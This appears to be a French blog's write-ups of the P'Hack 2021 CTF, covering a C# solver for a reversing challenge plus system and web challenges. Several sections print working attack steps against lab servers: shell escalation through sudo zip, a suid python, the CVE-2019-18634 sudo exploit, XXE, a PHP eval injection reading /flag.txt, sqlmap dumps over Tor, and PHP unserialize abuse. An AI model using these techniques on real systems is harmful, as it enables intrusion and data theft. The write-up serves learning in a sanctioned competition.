id9 * id1 + id8 == 2453
id13 * id14 - id7 == 2083
id13 + id9 + id10 * id8 == 5630
id17 * (id10 + id0) == 12150

id14 * id6 * (id13 ^ (id12 - id10)) == 16335
(id17 - id16) * (id0 ^ (id9 + id5)) == -5902
(id6 ^ ((char)(id10 ^ id9) - id18 - id11)) == -199
id17 * (char)(id14 ^ id7) == 7200
id2 * id16 + id1 * (char)(id0 ^ id17) == 9985
(id14 ^ id6) * id18 == 10080

Une fois ces equations disponible, ça n'a pas l'air si compliqué, un petit bout de programme C# plus tard on a un code fonctionnel pour récupérer le flag

char[] id = new char[19];
for (var i = 0; i < id.Length; i++)
{
    id[i] = '¤';
}
for (int c11 = MIN ; c11 < MAX; c11++) // id3 - id11 == 11                  => id3 = id11 + 11
{
    int c3 = c11 + 11;
    int expected12_5 = 110 - c3;
    for (int c5 = MIN; c5 < MAX; c5++) // id12 + id3 - id5 == 110           => id12 - id5 = 110 - id3
    {
        int c12 = c5 + expected12_5;
        int expected7_4 = 132 - c12;
        for (int c4 = MIN; c4 < MAX; c4++) // id7 + id12 - id4 == 132           => id7 - id4 = 132 - id12
        {
            int c7 = c4 + expected7_4;
            int expected8_15 = 176 + c4;
            for (int c8 = MIN; c8 < MAX; c8++) // id8 + id15 - id4 == 176           => id8 + id15 = 176 + id4
            {
                int c15 = expected8_15 - c8;
                int c2 = (c8 ^ 3) - c4; // (id8 ^ (id4 + id2)) == 3          => id4 + id2 = 3 ^ id8
                if (c2 < MIN || c2 > MAX)
                {
                    continue;
                }

                if (c3 * c15 + c2 * c11 != 18888)
                {
                    continue;
                }

                int expected16_0 = 182 + c5 - c2;
                for (int c16 = MIN; c16 < MAX; ++c16)
                {
                    int c0 = expected16_0 - c16;
                    int c13 = 15049 / c16 - c5;
                    int c18 = (5408 + c12 - c15) / c4;
                    int c1 = (83 ^ (c15 - c7)) ^ c18;
                    if (c0 < MIN || c0 > MAX) continue;
                    if (c1 < MIN || c1 > MAX) continue;
                    if (c13 < MIN || c13 > MAX) continue;
                    if (c18 < MIN || c18 > MAX) continue;

                    int c6 = (17872 - c1 * c3) / c11;
                    if (c6 < MIN || c6 > MAX) continue;
                    int c9 = (2453 - c8) / c1;
                    if (c9 < MIN || c9 > MAX) continue;
                    int c14 = (2083 + c7) / c13;
                    if (c14 < MIN || c14 > MAX) continue;
                    int c10 = (5630 - c13 - c9) / c8;
                    if (c10 < MIN || c10 > MAX) continue;
                    int c17 = 12150 / (c10 + c0);
                    if (c17 < MIN || c17 > MAX) continue;

                    if ((c14 * c6 * (c13 ^ (c12 - c10)) == 16335 &&
                        (c17 - c16) * (c0 ^ (c9 + c5)) == -5902 &&
                        (c6 ^ ((c10 ^ c9) - c18 - c11)) == -199 &&
                        c17 * (c14 ^ c7) == 7200 &&
                        c2 * c16 + c1 * (c0 ^ c17) == 9985 &&
                        (c14 ^ c6) * c18 == 10080
                        ))
                    {
                        id[0] = (char) c0; id[1] = (char) c1; // [...]
                        Console.WriteLine(new string(id));
                    }
                }
            }
        }
    }
}

En quelques secondes on récupère la réponse à savoir q4Eo-eyMq-1dd0-leKx il ne nous reste plus qu'à soumettre notre flag

PHACK{q4Eo-eyMq-1dd0-leKx}

Un autre write-up fait par SoEasY pour ce challenge, qui notamment aborde l'utilisation de Z3 (sur lequel il faut vraiment que je me mette à regarder à quoi ça ressemble) et une seconde méthode plus originale à base de angr.

P’Hack CTF – Reverse Engineering – SoEasY

SoEasYAuteur de l’article Par SoEasY

P'Hack - System

Julien Mialon — Sun, 11 Apr 2021 16:00:53 GMT

Sudoku - 128pts

Lors de l'un de vos tests de sécurité, vous compromettez un serveur applicatif.
Prouvez à vos clients que vous pouvez obtenir des informations sensibles d'autres utilisateurs.

=== Connexion SSH ===
Login : padawan
Mdp : padawan
Serveur : sudoku.phack.fr

On se connecte au serveur avec les identifiants fournis et on reçoit le message d'accueil suivant :

Bienvenue !
Le flag se trouve dans /home/master/flag.txt
Malheureusement, tu n'as pas les droits de le lire.
Trouves un moyen d'y accéder par toi même.
Bonne chance...

Généralement dans ce genre de challenge, on commence par lancer la commande suivante pour récupérer des informations sur ce qu'on pourrait faire :

$ sudo -l 
User padawan may run the following commands on sudoku:
    (master) NOPASSWD: /usr/bin/zip

On apprend qu'on peut lancer la commande zip en tant que master sans mettre de mot de passe, c'est plutôt un bon début. Un petit tour sur https://gtfobins.github.io/gtfobins/zip/ nous donne l'information des paramètres à utiliser sur la commande zip pour otenir un shell. On lance donc les commandes suivantes :

$ cd /home/master
$ sudo -u master zip plop.zip flag.txt --test --unzip-command 'sh #'
$ whoami
master

On a réussi à avoir un shell en tant que master, on a plus qu'à lire le fichier et le flag est disponible.

$ cat flag.txt 
PHACK{U_h4v3_tH3_suP3r_P0w3r}

To B, or ! to B - 128pts

Votre client vous remercie pour votre travail et vous assure qu'il a fait les modifications nécessaires pour améliorer la sécurité de son serveur applicatif.
Prouvez-lui que ce n'est toujours pas suffisant.

=== Connexion SSH ===
Login : padawan
Mdp : padawan
Serveur : toBOrNot2B.phack.fr

On se connecte sur le nouveau serveur, même message que précédemment mais cette fois la commande sudo n'est pas disponible. On tente de chercher les fichiers qui aurait un suid avec la commande suivante.

$ find / -perm -4000 2>> /dev/null
/usr/bin/python3.8

On vérifie cet exécutable avec

$ ls -l /usr/bin/python3.8
-rwsr-xr-x    1 master   root         14048 Mar 15 12:52 /usr/bin/python3.8

Justement le suid est pour l'utilisateur master. On va donc se servir de python pour devenir master et lire le fichier.

$ ./python3.8 -c 'print(open("/home/master/flag.txt", "r").read());'
PHACK{U_4r3_hiM_bu7_h3's_n07_U}

Sudoku v2 - 256pts

L'administrateur du serveur a voulu vous aider en ajoutant une aide visuelle lors de la saisie de votre mot de passe.
Hum Hum.. C'est pas une bonne idée !

=== Connexion SSH ===
Login : padawan
Mdp : padawan
Serveur : sudoku2.phack.fr

On commence par lancer la commande sudo pour vérifier si on a pas des droits sur quelque chose

$ sudo -l
[sudo] password for padawan:********
Sorry, user padawan may not run sudo on sudoku-2.

Il semble qu'on soit tombé sur cette histoire d'aide visuelle justement. On va en apprendre un peu plus sur sudo avec la commande suivante

$ sudo --version
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2

Une petite recherche google nous apprend qu'on peut exploiter cette version quand l'aide visuelle est justement activé https://nvd.nist.gov/vuln/detail/CVE-2019-18634. On trouve ce repo github contenant plusieurs exploits pour sudo. On ne récupère que celui qui nous intéresse.

TH3xACE/SUDO_KILLER

A tool to identify and exploit sudo rules’ misconfigurations and vulnerabilities within sudo for linux privilege escalation. - TH3xACE/SUDO_KILLER

GitHubTH3xACE

On lance l'exploit et on obtient un shell root en quelques secondes

$ ./CVE-2019-18634.sh
[sudo] password for padawan: 
Sorry, try again.
Sorry, try again.
bash-5.1# exit
sudo: 3 incorrect password attempts
Exploiting!
# whoami
root

Il ne nous reste plus qu'à lire le fichier maintenant qu'on est root.

# cat /home/master/flag.txt      
PHACK{*_****_****_****_***_**_*_****_***}

Et oui, le flag est plein d'étoiles...

Graduated - 256pts

Vous avez raté votre examen de PHP. Cheh!
Furieux, vous avez décidé de prouver vos compétences en modifiant directement votre note sur le serveur de votre école.
Vous avez réussi à compromettre les identifiants de votre professeur absent.

=== Connexion SSH ===
Login : teacher
Mdp : teacher
Serveur : graduated.phack.fr

Et le message de bienvenue du serveur

Bienvenue !
Le flag se trouve dans /home/rector/flag.txt
Malheureusement, tu n'as pas les droits de le lire.
Trouves un moyen d'y accéder par toi même.
Bonne chance...

On va faire un tour dans le home de l'utilisateur rector et on y découvre plusieurs choses :

$ ls -l
total 2236
-r--------    1 rector   root            39 Apr  1 22:56 flag.txt
-rw-r--r--    1 rector   nogroup      12288 Apr  7 09:49 graduation.db
-rw-r--r--    1 rector   root       2257947 Apr 11 15:06 integrator.log
-r-xr-----    1 rector   root          4708 Apr  1 22:56 integrator.py

Le fichier graduation.db semble être une base de données SQLite qui contient les notes des élèves justement. Et le fichier integrator.log on suppose est le log de l'exécution du script python integrator.py auquel nous n'avons pas accès.

$ tail -n 10 integrator.log 
11/04/2021 15:07:00     [+] Lancement de l'intégration
11/04/2021 15:07:00     [+] Analye des fichiers dans "/home/teacher/evaluations/".
11/04/2021 15:07:00     [+] Intégration terminée


11/04/2021 15:08:00     [+] Lancement de l'intégration
11/04/2021 15:08:00     [+] Analye des fichiers dans "/home/teacher/evaluations/".
11/04/2021 15:08:00     [+] Intégration terminée

On suppose que le script analyse un fichier dans /home/teacher/evaluations/ pour l'intégrer dans la base de données SQLite. On retourne dans notre home directory et on trouve un fichier template.xml qui contient le XML suivant

$ cat template.xml 


  
    Xavier
    DUPONT DE L
  
  15
  Biologie
  
    Emile
    LOUIS
  
  Elève motivé et consciencieux. Ne parle pas beaucoup avec les autres étudiants. Attention : Absence en cours depuis plusieurs semaines.

On essaie de changer le texte puis de mettre ce template dans le dossier ./evaluations et une minute plus tard, il est intégré dans la base de données. On a donc trouvé d'où viennent les notes. Pour obtenir un peu plus d'information sur ce qui est utilisé dans le script python, on va volontairement lui fournir un xml non valide. Une fois intégré, on retourne voir le log et on découvre :

11/04/2021 15:14:00     [+] Lancement de l'intégration
11/04/2021 15:14:00     [+] Analye des fichiers dans "/home/teacher/evaluations/".
11/04/2021 15:14:00     [+] Fichier "aa.xml" en cours d'analyse.
Traceback (most recent call last):
  File "/home/rector/integrator.py", line 137, in 
    process()
  File "/home/rector/integrator.py", line 104, in process
    tree = etree.parse(GRADE_FOLDER_PATH + filename, parser)
  File "src/lxml/etree.pyx", line 3521, in lxml.etree.parse
  File "src/lxml/parser.pxi", line 1859, in lxml.etree._parseDocument
  File "src/lxml/parser.pxi", line 1885, in lxml.etree._parseDocumentFromURL
  File "src/lxml/parser.pxi", line 1789, in lxml.etree._parseDocFromFile
  File "src/lxml/parser.pxi", line 1177, in lxml.etree._BaseParser._parseDocFromFile
  File "src/lxml/parser.pxi", line 615, in lxml.etree._ParserContext._handleParseResultDoc
  File "src/lxml/parser.pxi", line 725, in lxml.etree._handleParseResult
  File "src/lxml/parser.pxi", line 654, in lxml.etree._raiseParseError
  File "/home/teacher/evaluations/aa.xml", line 16
lxml.etree.XMLSyntaxError: EndTag: '


On apprend que le parseur XML utilisé est lxml. On va tester une Injection XXE (XML eXternal Entity) pour essayer de faire lire le flag lors du parsing XML. On créé le fichier suivant

]>

  
    PLOP
    BOUHBOUH
  
  12
  Bio
  
    Emile
    LOUIS
  
  un petit commentaire &flagme;


Et après une minute, notre fichier est lu et intégré par le script python, un simple cat sur le fichier de base de données nous permet de récupérer le flag
PHACK{XmL_3x7Ern4l_3n7i7iEs_fr0m_b4sH}



P'Hack - Web
Julien Mialon — Sun, 11 Apr 2021 16:00:32 GMT
Une dizaine de challenge dans cette catégorie
Hello World - 32pts
Vous êtes débutants ?
Nous vous avions dit que ce n'était pas un problème.
Voici de quoi commencer !

Lien du challenge : hello-world.phack.fr
Un petit challenge très simple juste pour se mettre en route, ça permet aussi de vérifier que les configurations VPN fonctionnent bien. On ouvre l'url et on se retrouve sur une page avec un bouton à cliquer : 
On arrive sur la page http://hello-world.phack.fr/step-1-28d43e77.php et on nous indique de ne surtout pas regarder le code source de la page. À ce niveau là je commence à switcher et à passer les requêtes sur Postman. On a un lien vers la page 2 en commentaire dans les sources http://hello-world.phack.fr/step-2-c1cc9945.php. On nous indique de regarder les header HTTP pour récupérer l'adresse de la page 3 http://hello-world.phack.fr/step-3-ec119828.php. On va ensuite voir dans les cookies (ou dans le Header HTTP Set-Cookie) pour récupérer l'adresse suivante http://hello-world.phack.fr/step-4-b270e4f9.php. Sur la page est affiché un texte en Base64 : 
c3RlcC01LTFjM2VmNzA2LnBocA==
Texte que l'on décode en l'adresse de la page 5 http://hello-world.phack.fr/step-5-1c3ef706.php où est affiché un hash md5 à craquer avant de le soumettre via un formulaire. Le hash est : 8621ffdbc5698829397d97767ac13db3, on le soumet sur https://crackstation.net et on récupère le résultat qu'on soumet afin de passer à l'étape suivante sur la page http://hello-world.phack.fr/step-6-c1867dd2.php. Cette page nous indique d'appeler une fonction javascript avec un nom spécifique, on ouvre la console du navigateur et on lance l'appel à la fonction. L'appel fait une redirection vers la dernière page http://hello-world.phack.fr/step-7-d7c86a9d.php qui contient le flag :
PHACK{W3lc0me_To_7h3_H4ch1ng_WooorlD!!}
Wall-E - 64pts
Wall-E est le dernier être sur Terre !
Aide-le à trouver son chemin dans ce drôle de monde.

Lien du challenge : wall-e.phack.fr
On teste rapidement les différentes pages du site, rien de probant qui nous donnerait un indice sur comment démarrer ce challenge dans les sources du site, une barre de recherche qui ne fait rien, un formulaire de contact mal implémenté qui renvoie version une erreur HTTP 405. Mais il y a cette notion de robot et Wall-E dans le sujet est en gras, on tente de récupérer le fichier /robots.txt et on y trouve le contenu suivant :
User-Agent: WallEbot
Allow: /index.html
Disallow: /8059dd56-3bfb-11eb-adc1-0242ac120002/nothing-here.txt

On accède donc à cette page mystèrieuse où notre petit robot n'a pas le droit d'accéder et on trouve le flag !
PHACK{r0b07s_4r3_tH3_n3w_hUm4Ns}

Fuzz Me - 128pts
Votre ami vient vous voir en panique car il a perdu ses identifiants et il ne peut plus se connecter à son site préféré.
Aidez-le à sauver la situation.

Lien du challenge : fuzz-me.phack.fr
On nous présente ici un formulaire de login et rien d'autre de disponible. 
Vu le titre du challenge, on va tenter de fuzzer (essayer) différentes pages via un outil automatique pour voir si on pourrait découvrir d'autre page du site qui ne serait peut être pas sécurisé. (les commandes suivantes sont utilisé dans Exegol
$ ffuf -c -w `fzf-wordlists` -u http://fuzz-me.phack.fr/FUZZ -fc 404 -mc all

En donnant une liste communes de noms de page web, on se retrouve malheureusement avec uniquement favicon.icon de détecté. En retournant sur le site, on voit qu'au clic sur le bouton connexion, un appel est fait avec les paramètres entrés : POST http://fuzz-me.phack.fr/api/login. On va essayer de fuzzer sur /api peut être qu'on aura plus de chances.
$ ffuf -c -w `fzf-wordlists` -u http://fuzz-me.phack.fr/api/FUZZ -fc 404 -mc all

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://fuzz-me.phack.fr/api/FUZZ
 :: Wordlist         : FUZZ: /usr/share/dirb/wordlists/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
 :: Filter           : Response status: 404
________________________________________________

login                   [Status: 405, Size: 178, Words: 20, Lines: 5]
sessions                [Status: 200, Size: 1332, Words: 1, Lines: 2]
user                    [Status: 400, Size: 33, Words: 4, Lines: 1]
:: Progress: [4614/4614] :: Job [1/1] :: 245 req/sec :: Duration: [0:00:20] :: Errors: 0 ::

Pour le coup, on a un résultat un peu plus intéressant, on retrouve notre page login mais on découvre également deux autres url accessible, sessions et user. On commence par /api/sessions qui a le mérite de nous renvoyer une HTTP 200 OK et on tombe sur une réponse json qui contient du json en base64 :
{
   "sessions":[
      "eyJ1c2VyIjogIjY1YTlmYzRjLWIwNDYtNDE3OS1iMDE5LTdlMDcxZDFjZTc5ZiIsICJpc0FkbWluIiA6IGZhbHNlLCAid2VpcmRfc3R1ZmYiIDogIitBSEc5NUZKeHRzNGoxNFJuTHdxaEE9PSIsICJoYXBweV9zbWlsZXkiIDogIvCfmI0ifQ==",
      "eyJ1c2VyIjogIjkwNjhjY2ZmLTBkOTgtNGViNS1iMjdkLTQyZDcwZTQyYmRkZCIsICJpc0FkbWluIiA6IGZhbHNlLCAid2VpcmRfc3R1ZmYiIDogIkkvS3M1clg0SGJSb2hhbm9pc1lUOXc9PSIsICJoYXBweV9zbWlsZXkiIDogIvCfpoQifQ==",
      "eyJ1c2VyIjogImIwZWU5YjNjLTdkNjMtNDQwZi05ZDcyLWM3NTg2ODZiMDVlNCIsICJpc0FkbWluIiA6IGZhbHNlLCAid2VpcmRfc3R1ZmYiIDogIjYwY3k4bUJrM3luOFNhRisvSGVhUHc9PSIsICJoYXBweV9zbWlsZXkiIDogIvCfkp0ifQ==",
      "eyJ1c2VyIjogIjEzYTE0NTExLTc3NzktNDJmNS04MjliLTc1OTc3MzRjODc0YyIsICJpc0FkbWluIiA6IGZhbHNlLCAid2VpcmRfc3R1ZmYiIDogIjRVQWljczZ3TzkvVzM3Qjd2Q0NQT3c9PSIsICJoYXBweV9zbWlsZXkiIDogIvCfmYsifQ==",
      "eyJ1c2VyIjogIjg3MmUwYTQxLTk5ZTUtNGU3Ni1hNWU3LTk2MDkzNzU3ZmE4MSIsICJpc0FkbWluIiA6IHRydWUsICJ3ZWlyZF9zdHVmZiIgOiAiU1NCaGJTQjBhR1VnWVdSdGFXNGdJUT09IiwgImhhcHB5X3NtaWxleSIgOiAi8J+RqOKAjfCfjbMifQ==",
      "eyJ1c2VyIjogIjk2OGYyZTlkLTI3YzEtNDUwMy05NzM5LTNiMWM4NjMwNjU2NCIsICJpc0FkbWluIiA6IGZhbHNlLCAid2VpcmRfc3R1ZmYiIDogIllOK1pWNWxTMkZTNjlaMmhmd1RaT3c9PSIsICJoYXBweV9zbWlsZXkiIDogIvCfjIgifQ==",
      "eyJ1c2VyIjogIjViNTgwMDcyLTM2YzAtNDU0Yi04NThiLTVmZmJjOTRiNjgyNSIsICJpc0FkbWluIiA6IGZhbHNlLCAid2VpcmRfc3R1ZmYiIDogIkZkNWlPVU9qMDJrZmU0aDMyOGplNHc9PSIsICJoYXBweV9zbWlsZXkiIDogIvCfkoMifQ=="
   ]
}

On décode toutes les lignes et on récupère les json suivants
{"user": "65a9fc4c-b046-4179-b019-7e071d1ce79f", "isAdmin" : false, "weird_stuff" : "+AHG95FJxts4j14RnLwqhA==", "happy_smiley" : "😍"}
{"user": "9068ccff-0d98-4eb5-b27d-42d70e42bddd", "isAdmin" : false, "weird_stuff" : "I/Ks5rX4HbRohanoisYT9w==", "happy_smiley" : "🦄"}
{"user": "b0ee9b3c-7d63-440f-9d72-c758686b05e4", "isAdmin" : false, "weird_stuff" : "60cy8mBk3yn8SaF+/HeaPw==", "happy_smiley" : "💝"}
{"user": "13a14511-7779-42f5-829b-7597734c874c", "isAdmin" : false, "weird_stuff" : "4UAics6wO9/W37B7vCCPOw==", "happy_smiley" : "🙋"}
{"user": "872e0a41-99e5-4e76-a5e7-96093757fa81", "isAdmin" : true, "weird_stuff" : "SSBhbSB0aGUgYWRtaW4gIQ==", "happy_smiley" : "👨‍🍳"}
{"user": "968f2e9d-27c1-4503-9739-3b1c86306564", "isAdmin" : false, "weird_stuff" : "YN+ZV5lS2FS69Z2hfwTZOw==", "happy_smiley" : "🌈"}
{"user": "5b580072-36c0-454b-858b-5ffbc94b6825", "isAdmin" : false, "weird_stuff" : "Fd5iOUOj02kfe4h328je4w==", "happy_smiley" : "💃"}

On tente maintenant la page http://fuzz-me.phack.fr/api/user où on récupère une erreur.
{"error": "Paramètre manquant !"}

Paramètre manquant, ça voudrait donc dire qu'on peut peut être query les infos d'un user à partir de ce endpoint et qu'il faut sûrement lui passer le userId qu'on a trouvé dans la page session. On va fuzzer cette page pour trouver le nom du paramètre. Pour cela, on indique bien au filtre de récupérer tout ce qui n'est pas une erreur HTTP 400 BadRequest.
$ ffuf -c -w `fzf-wordlists` \
    -u http://fuzz-me.phack.fr/api/user\?FUZZ\=13a14511-7779-42f5-829b-7597734c874c \
    -fc 400 -mc all
uuid                    [Status: 500, Size: 27, Words: 4, Lines: 1]

On obtient comme résultat le paramètre uuid mais qui renvoie une erreur HTTP 500. On ouvre l'url avec le bon nom du paramètre et on s'aperçoit que le retour json est Uuid inconnu !. Ok donc tout va bien, il faut juste qu'on trouve le bon uuid. On met nos identifiants d'utilisateur dans un fichier qu'on nomme userIds et on relance ffuf pour trouver une session qui fonctionne
$ ffuf -c -w userIds -u http://fuzz-me.phack.fr/api/user\?uuid\=FUZZ -fc 500 -mc all
872e0a41-99e5-4e76-a5e7-96093757fa81 [Status: 200, Size: 146, Words: 16, Lines: 1]

Seulement l'un des identifiants est valide, on ouvre l'url avec cet id et on reçoit comme réponse :
{
   "info":{
      "name":"Biden",
      "firstname":"Joe",
      "login":"admin",
      "password":"NeOIsTh3T4rget<3",
      "description":"Président, tout simplement."
   }
}

On retourne sur la page d'accueil du site et on se connecte avec le login et le password de la réponse. Et on nous affiche le flag :
PHACK{th1s_1s_H0w_w3_d0_enum3r4ti0n_m4n}

X-tension - 128pts
Votre entreprise est victime d'un méchant ransomware.
Heureusement Sophie du marketing a développé un site pour récupérer les fichiers chiffrés. 
En tant qu'expert en sécurité vous jetez un oeil pour vous faire votre avis.

Lien du challenge : x-tension.phack.fr
Première chose que l'on voit en arrivant sur le site, c'est que l'auteur ne tient vraiment pas à sa RAM pour avoir développer un challenge qui ne fonctionne que sous Chrome.
Quelques minutes d'installation plus tard, nous voici de retour pour trouver encore un message d'erreur
Une extension ? Quelle extension ?? Allons faire un tour dans les sources de la page pour trouver : 


Si tu penses que je vais installer une extension comme ça sans savoir ce qu'elle fait, tu te mets le doigt dans l'oeil xD.
$ wget -O extension.zip https://bit.ly/3ufGW3f

On dézippe le fichier ainsi obtenu pour avoir accès au code de l'extension, quelques fichiers javascript comme on pouvait s'y attendre mais surtout le flag.
PHACK{CRX_F1l3_R3v3rs1nG}

Le fichier de l'extension est également disponible ici : https://blog.julienmialon.com/uploads/ctf/phack/extension.zip
Harduino - 256pts
Il semblerait que vous ayez trouvé un étrange gestionnaire de code... Vous devez surement pouvoir en tirer quelque chose.

Le flag se trouve dans le fichier /flag.txt.

Lien du challenge : harduino.phack.fr
On ouvre le site web en question et on se retrouve avec ce qui ressemble au contenu du fichier arduino.php et à droite le résultat de l'exécution de ce fichier. 
La première étape ici est de tester si on peut accéder à la page arduino.php directement. On récupère l'adresse dans l'iframe qui est affiché sur notre page et on peut directement accéder à : http://harduino.phack.fr/workspace/apps/arduino/arduino.php.
Maintenant, d'après le code PHP qui nous ai fourni, on voit qu'on peut injecter le message à afficher dans la variable GET nommée 'message'. On essaie avec l'url : 
http://harduino.phack.fr/workspace/apps/arduino/arduino.php?message=plop

Et plop s'affiche bien à la place de 'Hello World'. Donc ce qui va nous intéresser, c'est d'exploiter l'injection de message pour lire notre fichier flag. On se concentre sur le code lié à l'utilisation du paramètre dans l'URL.
if (isset($_GET["message"])) {
    $custom = $_GET["message"];
    $message = preg_replace("/^.*$/e", "\"$custom\"", $message);
}

À première vue, on doit pouvoir commencer notre message par un double quote et exécuter du code PHP lors de l'évaluation de $custom. On test simplement en mettant un double quote au début de notre message précédent et bingo ! On récupère une erreur PHP !
Notre paramètre peut donc permettre d'injecter du code. À partir de là, il ne nous reste qu'à construire le bon code PHP pour aller lire le flag.
arduino.php?message=".file_get_contents('/flag.txt')."

Et le flag s'affiche sur l'écran de l'arduino. Pour ne pas s'embêter lors de la copie, on affiche les sources de la page et on le récupère.
PHACK{W4SNT_DAT_HARD_AFT3R_ALL}

Un bon rappel qu'il faut TOUJOURS sécuriser ses inputs en PHP et ne pas permettre de l'exécution de code.
VOD - 256pts
Votre équipe a reçu un message (très) sécurisé de la part d'un agent soit-disant s3c3rt vous invitant à vous rendre sur ce site  http://xwjtp3mj427zdp4tljiiivg2l5ijfvmt5lcsfaygtpp6cw254kykvpyd.onion:1337.
Drôle d'url.
Ici on nous donne un site web en .onion, c'est le signe qu'il faut lancer Tor pour pouvoir y accéder. 
On se retrouve sur une liste de plateforme supportée par notre super site de VOD. Et on peut accèder au détail des infos de chaque plateforme avec la page /platform.php?id=1. Un paramètre dans l'url comme ça, on va tester une injection SQL pour voir si on peut s'en servir pour récupérer des informations. On tente la page /platform.php?id=' or et on se retrouve avec une erreur. On semble être sur la bonne voie.
On va aller un peu plus loin en utilisant sqlmap. Seul petit subtilité ici, il est nécessaire que sqlmap se connecte au site via tor.
$ sudo service start tor # on démarre le proxy tor
$ sqlmap --tor --tor-type=SOCKS5 -u "http://xwjtp3mj427zdp4tljiiivg2l5ijfvmt5lcsfaygtpp6cw254kykvpyd.onion:1337/platform.php?id=1"

Le paramètre est bien sensible à une injection SQL, un serveur MySQL est identifié. On liste les bases de données disponible puis les tables de la base VOD :
$ sqlmap --tor --tor-type=SOCKS5 -u "http://xwjtp3mj427zdp4tljiiivg2l5ijfvmt5lcsfaygtpp6cw254kykvpyd.onion:1337/platform.php?id=1" -p id --dbs
available databases [2]:
[*] information_schema
[*] vod

$ sqlmap --tor --tor-type=SOCKS5 -u "http://xwjtp3mj427zdp4tljiiivg2l5ijfvmt5lcsfaygtpp6cw254kykvpyd.onion:1337/platform.php?id=1" -p id -D vod --tables
Database: vod
[2 tables]
+----------+
| platform |
| s3cr3t   |
+----------+

On suppose que la table platform ne nous intéresse pas forcément, on va dump la table s3cr3t
$ sqlmap --tor --tor-type=SOCKS5 -u "http://xwjtp3mj427zdp4tljiiivg2l5ijfvmt5lcsfaygtpp6cw254kykvpyd.onion:1337/platform.php?id=1" -p id -D vod -T s3cr3t --dump
Database: vod
Table: s3cr3t
[1 entry]
+----+--------------------------+
| id | flag                     |
+----+--------------------------+
| 1  | PHACK{D0_U_kn0w_sQLm4p?} |
+----+--------------------------+

on récupère donc le flag
PHACK{D0_U_kn0w_sQLm4p?}

PHackTory - 256pts
Un nouveau magasin de fabrication de chocolat ouvre en ville. 
Soit le premier à passer commande !

Lien du challenge : phacktory.phack.fr
Certainement le challenge où on a le plus tourner en rond, des heures de perdues passées à regarder ces tablettes de chocolats. Le site web dispose d'une page index.php et c'est malheureusement tout. Aucun indice de disponible pour savoir ce qu'on pouvait faire dessus. Fuzzer le site ne nous a donné aucun résultat avec les différentes liste qu'on a pu essayer. Bref, au bout de 2 ou 3 jours, on fini par tester l'intégralité des outils dispo dans Kali pour les vulnérabilités web jusqu'à trouver le graal avec la commande
$ nikto -host http://phacktory.phack.fr
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          12.42.0.10
+ Target Hostname:    phacktory.phack.fr
+ Target Port:        80
+ Start Time:         2021-04-11 14:26:54 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ Retrieved x-powered-by header: PHP/8.0.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /backup.zip: Potentially interesting archive/cert file found.
+ /backup.zip: Potentially interesting archive/cert file found. (NOTE: requested by IP address).
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.

La seule ligne intéressante ici étant la présence d'un /backup.zip. (On découvrira en même temps que la commande $ nmap --script vuln phacktory.phack.fr nous aurait également révélée la présence de cette archive)
Le fichier est disponible ici : http://blog.julienmialon.com/uploads/ctf/phack/phacktory.zip
On découvre des images mais surtout le code de la page index.php. Peut être pas la version finale mais certainement une version très proche de celle qui permet de présenter le site.
 type = $_POST['type'];
        } else { $this -> order = "milky"; }
        if(isset($_POST['quantity'])) {
            $this -> quantity = $_POST['quantity'];
        } else { $this -> quantity = "50"; }
    }
    public function __wakeup() {
      global $DEBUG;
      $types = ["dark", "white", "milky", "fruity", "95%", "flag"];
      $quantities = [1, 5, 10, 25, 50, 100, "PHACK{}"];
      if (isset($this -> type) && isset($this -> quantity)) {
        if(in_array($this -> type, $types) && in_array($this -> quantity, $quantities)) {
            prepareOrder($this);
            return "Votre commande de " . $this -> quantity . " chocholats ("  . $this -> type .  ") est en préparation.";
        }
        else {
          if ($DEBUG) {
            //Affichage des variables pour deboguer. Enfin..Je crois que c'est ça que ca fait.
            eval($this -> type . ' ' . $this -> quantity);
          }
          return "Il semble y avoir un problème avec votre commande. Merde de contacter quelqu'un d'autre.";
        }
      }
    }
    public function prepareOrder(){ }
}
$a = $_GET['what'];
$b = $_POST['is'];
$c = $_POST['cool'];
$d = $_GET['the'];
?>


  
    
    PHackTory
    
  
  
    
       PHackTory
        Votre magasin se prépare pour les fêtes. 
 Les commandes ne sont pas encore ouvertes.
      
     1538) {
              $myOrder = unserialize($_GET['please']);
              return "Oui !";
            }
            else { return "Peut-être !"; }
          }
          else { return "Certainement pas!"; }
      }
      else { return "Non !"; }
    ?>
  


On commence à découvrir des choses intéressantes ici, tout d'abord la portion de code basse dans le contenu HTML semble être un point d'entrée prometteur. L'appel à la fonction PHP unserialize est assez connu pour générer des problèmes de sécurité, surtout quand on désérialize un paramètre fourni par l'utilisateur. La portion de code qui nous intéresse dans un premier temps va donc être
 1538) {
      $myOrder = unserialize($_GET['please']);
      return "Oui !";
    }
  }
}

Ok, donc pour arriver à la ligne qui nous intéresse sur le unserialize, il est nécessaire de passer quelques paramètres dans la requête :
URL : http://phacktory.phack.fr/index.php?what=is&the=flag
Post data : 
  - is=1539
  - cool=Storm0x2a

Il ne nous reste plus qu'à fournir un payload intéressant à la variable please dans l'url pour exploiter la faille. Il n'y a pas grand chose d'autre que la classe PHackTory dans ce fichier que l'on pourrait exploiter. Il faut savoir que la fonction unserialize va appeler la méthode __wakeup() de l'objet une fois désérializer, nous pouvons donc exploiter le code de cette méthode. Le constructeur ne sera pas appelé et donc peut être ignorer. On se retrouve donc avec cette partie de code :
public function __wakeup() {
  global $DEBUG;

  $types = ["dark", "white", "milky", "fruity", "95%", "flag"];
